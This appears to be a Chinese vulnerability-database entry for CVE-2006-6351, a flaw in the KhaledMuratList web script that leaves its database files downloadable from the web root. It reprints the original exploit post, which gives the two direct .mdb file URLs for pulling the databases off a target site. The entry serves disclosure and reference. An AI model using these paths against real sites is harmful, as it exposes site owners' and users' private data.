KhaledMuratLis web根目录敏感数据泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192633 漏洞类型 未知
发布时间 2006-12-06 更新时间 2006-12-06
CVE编号 CVE-2006-6351 CNNVD-ID CNNVD-200612-101
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/87317
https://cxsecurity.com/issue/WLB-2006120070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-101
|漏洞详情
KhaledMuratList在web的根目录下存储敏感数据且未采取有效的访问控制,远程攻击者可以通过直接请求(1)CL2F9R1A2C1N.mdb或(2)Data2F9R1A2C1N.mdb来下载数据库。
|漏洞EXP
########################################################
# Title: KhaledMuratList                               #
# Author: BLaSTER                                      #
# Contact: blasterim (at) hotmail (dot) com [email concealed]                       #
# Script: http://www.aspindir.com/indir.asp?id=4478    #
########################################################

# http://[target]/[path]/db/[.mdb]

Example:

# http://victim.com/KhaledMuratList/db/CL2F9R1A2C1N.mdb
# http://victim.com/KhaledMuratList/db/Data2F9R1A2C1N.mdb

// Greetz : BLaCKWHITE, Satanist-imam, EaGLe, FreeZe, LGMAN and HackerBox.Us

"""""""""""""""""""""
# blasterim (at) hotmail (dot) com [email concealed]
# TURKEY
|受影响的产品
Khaledmuratlist Khaledmuratlist 0
|参考资料

来源:XF
名称:khaledmuratlist-mdb-file-disclosure(30661)
链接:http://xforce.iss.net/xforce/xfdb/30661
来源:BUGTRAQ
名称:20061202KhaledMuratListmdb
链接:http://www.securityfocus.com/archive/1/archive/1/453328/100/0/threaded
来源:SREASON
名称:1999
链接:http://securityreason.com/securityalert/1999
来源:SECUNIA
名称:23310
链接:http://secunia.com/advisories/23310